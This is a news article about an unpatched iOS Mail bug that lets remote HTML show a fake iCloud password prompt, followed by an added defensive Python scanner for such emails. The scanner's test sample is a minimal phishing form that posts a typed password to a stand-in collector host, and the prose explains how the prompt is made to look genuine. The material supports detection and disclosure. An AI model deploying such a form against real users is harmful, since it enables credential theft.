iOS Mail App Download – Fix iCloud Passwords Bugs


Apparently, Apple shipped an unpatched bug in the Mail app that could be a security threat to consumers, because they might be fooled into entering their iCloud passwords. Phishers would then get their hands on these passwords and use them for their own ends.

According to researcher Jan Soucek, who has published a proof-of-concept tool that exploits iOS, iCloud passwords could be stolen through the Mail app without users even being aware of the bug. He said on GitHub that “this bug allows remote HTML content to be loaded, replacing the content of the original email message,” and “JavaScript is disabled in this UIWebView, but it is still possible to build a functional password ‘collector’ using simple HTML and CSS.”

It seems that the code uses a cookie to detect that the user has already seen the page, after which it stops displaying the password prompt, so as not to raise suspicion. To demonstrate how this exploit works, Soucek posted a one-minute YouTube video, which you can watch below:

Soucek demonstrated that everything looks perfectly normal, because the password field has autofocus enabled, which is how Apple’s official password prompt is mimicked. Users are advised to ignore password prompts that appear while they are using Mail and to log into their iCloud accounts only when prompted outside the app.
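From the defender's side, the behaviour described above (remote content swapped into a message body, a password field with autofocus, a form that sends the credential off-device) leaves recognisable traces in the raw HTML of the e-mail. The scanner below is an added example written for this article, not Soucek's proof of concept or any Apple code; its heuristics, the `audit_mail_html` and `is_credential_prompt` names, and the two sample message bodies (including the `example.invalid` host) are all constructed for illustration.

```python
"""Heuristic audit of an HTML e-mail body for in-mail credential prompts.

Added example, not part of the article or of the proof of concept it
describes. The checks are assumptions derived from the behaviour the
article reports: a message that loads remote content over the original
body and presents an autofocused password field posting to a remote host.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

REMOTE_SCHEMES = {"http", "https"}
REMOTE_CONTAINERS = {"iframe", "frame", "object", "embed"}


def _is_remote(url: str) -> bool:
    """True when the URL points off-device over HTTP(S)."""
    return urlparse(url).scheme.lower() in REMOTE_SCHEMES


class _MailHtmlAuditor(HTMLParser):
    """Collects human-readable findings while walking the start tags."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        # Boolean attributes such as `autofocus` arrive with value None.
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append("password input field in message body")
        if "autofocus" in a:
            self.findings.append(f"autofocus on <{tag}> mimics a system prompt")
        if tag == "form" and _is_remote(a.get("action", "")):
            host = urlparse(a["action"]).hostname
            self.findings.append(f"form posts to remote host {host}")
        if tag in REMOTE_CONTAINERS and _is_remote(a.get("src") or a.get("data", "")):
            self.findings.append(f"<{tag}> loads remote content into the body")
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append("meta refresh replaces the message body")


def audit_mail_html(html: str) -> list[str]:
    """Return every suspicious trait found in the HTML body, in document order."""
    auditor = _MailHtmlAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


def is_credential_prompt(html: str) -> bool:
    """A body that both asks for a password and ships data off-device is a phish candidate."""
    findings = audit_mail_html(html)
    asks_for_password = any("password input" in f for f in findings)
    remote_sink = any(("remote host" in f) or ("remote content" in f) or ("meta refresh" in f)
                      for f in findings)
    return asks_for_password and remote_sink


# Constructed sample bodies (not taken from any real message).
BENIGN_NEWSLETTER = """
<html><body>
<img src="https://newsletter.example/banner.png" alt="banner">
<p>Read the full story at <a href="https://newsletter.example/story">our site</a>.</p>
</body></html>
"""

SUSPICIOUS_MESSAGE = """
<html><head><meta http-equiv="refresh" content="0; url=https://example.invalid/collector"></head>
<body><form action="https://example.invalid/collector" method="post">
<label>Password</label><input type="password" name="pw" autofocus>
</form></body></html>
"""

if __name__ == "__main__":
    for label, body in (("newsletter", BENIGN_NEWSLETTER), ("suspicious", SUSPICIOUS_MESSAGE)):
        print(f"{label}: credential prompt={is_credential_prompt(body)}")
        for f in audit_mail_html(body):
            print("  -", f)
```

Remote images and links are deliberately not flagged, since ordinary newsletters use them; the signal worth acting on in a mail gateway or an MUA plugin is the combination of a password field with any channel that sends the typed value, or the rendered body itself, off-device.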

Soucek explained that in January 2015 he found this bug in the Mail app, which resulted in HTML tags in email messages not being ignored. The vulnerability was filed under Radar #19479280, but Apple didn’t fix the bug, and Soucek felt it was his duty to warn users about the danger. That’s why he published the proof-of-concept code on GitHub.

Apple became aware of this problem, but one of the specialists said that this isn’t a “serious” security flaw, because the device’s data isn’t compromised. However, it is serious precisely because it’s not an old-school security issue: it combines social engineering with cloud services.

Last fall, there was a huge scandal involving many celebrities whose nude photos were stolen from their iCloud accounts, and Apple published a guide teaching its users how to recognise the genuine iCloud page. The FBI investigated a hacker after their attention was drawn by a flagged IP address.